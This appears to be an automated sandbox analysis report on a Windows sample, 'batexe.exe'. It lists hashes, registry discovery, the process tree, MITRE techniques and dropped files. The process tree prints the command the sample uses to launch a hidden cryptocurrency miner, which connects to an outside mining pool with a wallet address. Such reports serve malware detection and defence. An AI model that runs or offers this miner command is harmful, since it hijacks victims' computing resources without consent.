73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
298s
max time network
303s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
23/02/2024, 20:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1414748551-1520717498-2956787782-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1414748551-1520717498-2956787782-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2036	b2e.exe
3940	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3940	cpuminer-sse2.exe
3940	cpuminer-sse2.exe
3940	cpuminer-sse2.exe
3940	cpuminer-sse2.exe
3940	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3300-7-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3300 wrote to memory of 2036	3300	batexe.exe	86
PID 3300 wrote to memory of 2036	3300	batexe.exe	86
PID 3300 wrote to memory of 2036	3300	batexe.exe	86
PID 2036 wrote to memory of 740	2036	b2e.exe	87
PID 2036 wrote to memory of 740	2036	b2e.exe	87
PID 2036 wrote to memory of 740	2036	b2e.exe	87
PID 740 wrote to memory of 3940	740	cmd.exe	90
PID 740 wrote to memory of 3940	740	cmd.exe	90

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3300
- C:\Users\Admin\AppData\Local\Temp\96C2.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\96C2.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\96C2.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A3D1.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:740
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\96C2.tmp\b2e.exe

Filesize
16.0MB

MD5
53077edc17b5181ef1b596872e2d4b21

SHA1
cc0e8029832818bc694a72448e73d726d3d7ca4c

SHA256
015e09d73ad8efa1d29b5e119fe9f07f793787e01391889db5868a8c32374c34

SHA512
8dbd3a160f257b998e3ec2c6bc7ff94583ae18278b99b49bf668b8f42d74f8306076e8d46d21b3b8316a38b722b0260dbcf752a58507a04871cd9e5d738382e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\96C2.tmp\b2e.exe

Filesize
2.9MB

MD5
9317cafb85becd9011ca213e7be3a2bc

SHA1
1c84c389734da0532809700191b96dc61527e382

SHA256
644eb7fd5f540a11f942d00b2233e715a40b8548294924fc054db1e08b293090

SHA512
65120a9f1410f4b9350788c5898557be3d3b195f03b3425895748764fc052048f38998bb455cef4f25f748c696821a9a4622c8f09f6ae4603dcd6882be451684

Download Submit
C:\Users\Admin\AppData\Local\Temp\96C2.tmp\b2e.exe

Filesize
3.1MB

MD5
cea81276bfcadbab40dfada8a1786efa

SHA1
7e87cfddecb6643e1aecf513fb0f7df9c2970ca1

SHA256
f713fe09045452449d774de205829eb3d0b06e7326b74742ff053ebb26384a11

SHA512
393219cc167c982456e37f5582deb1dce950400a527064b35e4cbbd1a2a026db86ce223da3d8489818c70eded004e7adff969491be1e26bdcb9f9f91824f2673

Download Submit
C:\Users\Admin\AppData\Local\Temp\A3D1.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
2.3MB

MD5
4c04147c386ba8792ac6a03069572a8a

SHA1
dda67789fc1d0f2469ca95f01a5c81034853ca6a

SHA256
c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd

SHA512
a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
128KB

MD5
48c422e815911804d8322f84e605438f

SHA1
b577cb4575fdf07ead63d0f9831833f4f30788e9

SHA256
3247538f008c10c405b77c7a1ff636bd7f7e72b0cf4b5990870c157958b4e6ea

SHA512
0278d1c8a8bb02bb70bac382c89481451ddd147f2b195fed3cf1105524358a04703be54186e138d0e1f1423441e694cd292eb890cfe66bc421eb160821548f8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
5.0MB

MD5
b029429d52efe7354bf43a27f3d6041c

SHA1
1c5b5738480386e5f8f908ad8a64494cd3d326f6

SHA256
cde8d16cc83108b15c8913de56c0d089a6158a5b3cc901dd61341e6b53c6ce82

SHA512
b81f53a985a5f50f14f385f766e1972fdece940ae42046d7b4c47bb5b2d6ae05cdbd4222870bedc2a358e639f0cf50b8847def5b31f0f5b92817e1ca8ee03421

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
64KB

MD5
e98583e2f3157ea2561f40a91a79b195

SHA1
770932f48dbea7a78a3b21e3df65e329a27313ff

SHA256
f6b3de2ac1e9c449daf82a3bd6fa52d2ed60e73e8cdd25d5d2194586a8d10de2

SHA512
cfa97067447a389dc5439dc42ca467f97947fa7010314cad0b99655688361721720bb33e34a1c7b22c93d807327b756109f63d15a40df5aaec620b0d0e1acc7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
128KB

MD5
8d949f4e279a9a80f50d7c2e0c7bff36

SHA1
92e29300716211895b2d8cd4cf010452f0132152

SHA256
2e87614d15e62262c8b0a0c65e302b15e971b591469f3c679e7e516934cf621f

SHA512
36565dc0a3290ac8c5e0fd0a2756764ce8e49a7ef52a437caad549c7ea1ac3ac7dfe05cd4951ed6b17051768fd9733c94365d85832092c429b0b74ab62a338fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
192KB

MD5
625f906456510afaf916dd0384d76eee

SHA1
66c56574aff02fb199caa60ab71ca9f1c9e7fc92

SHA256
27baaef233592b03722c7d64c26d2270c0300ffb8e7f08a8e0d65212af4b848d

SHA512
041399c5ddc614d8b1a359238df8fb09258c95a0013e5139dbf4093b892395f5f78fa31fbecfee92966c5e78a5c5894005c98e559b8b5735ecf9c1995df51b17

Download Submit
memory/2036-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2036-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3300-7-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3940-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3940-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3940-45-0x0000000059A40000-0x0000000059AD8000-memory.dmp

Filesize
608KB

Download
memory/3940-47-0x0000000001040000-0x00000000028F5000-memory.dmp

Filesize
24.7MB

Download
memory/3940-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3940-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3940-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3940-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3940-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3940-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3940-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3940-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download